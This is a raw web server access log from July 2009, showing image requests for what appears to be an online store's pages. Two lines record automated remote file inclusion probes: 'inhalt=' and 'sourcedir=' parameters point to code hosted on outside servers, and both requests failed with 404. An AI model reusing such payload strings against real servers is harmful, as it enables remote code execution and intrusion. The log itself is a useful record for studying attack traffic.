75.140.75.14 - - [16/Jul/2009:01:40:28 -0400] "GET /images/sd_left-top.gif HTTP/1.1" 200 95 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C774539D475004F71001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:40:28 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C774539D475004F71001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:40:28 -0400] "GET /images/sd_left-bottom.gif HTTP/1.1" 200 95 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C774539D475004F71001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:40:29 -0400] "GET /images/sd_bottom-space.gif HTTP/1.1" 200 50 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C774539D475004F71001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:40:36 -0400] "GET /images/sd_bottom-right.gif HTTP/1.1" 200 101 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C774539D475004F71001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
59.22.140.17 - - [16/Jul/2009:01:40:38 -0400] "GET /logs/access_log.Q109061300%20%20/index.php?inhalt=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:01:40:38 -0400] "GET /logs/access_log.Q109052700%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
75.140.75.14 - - [16/Jul/2009:01:40:38 -0400] "GET /images/sd_inside-corner.gif HTTP/1.1" 200 95 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C774539D475004F71001+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
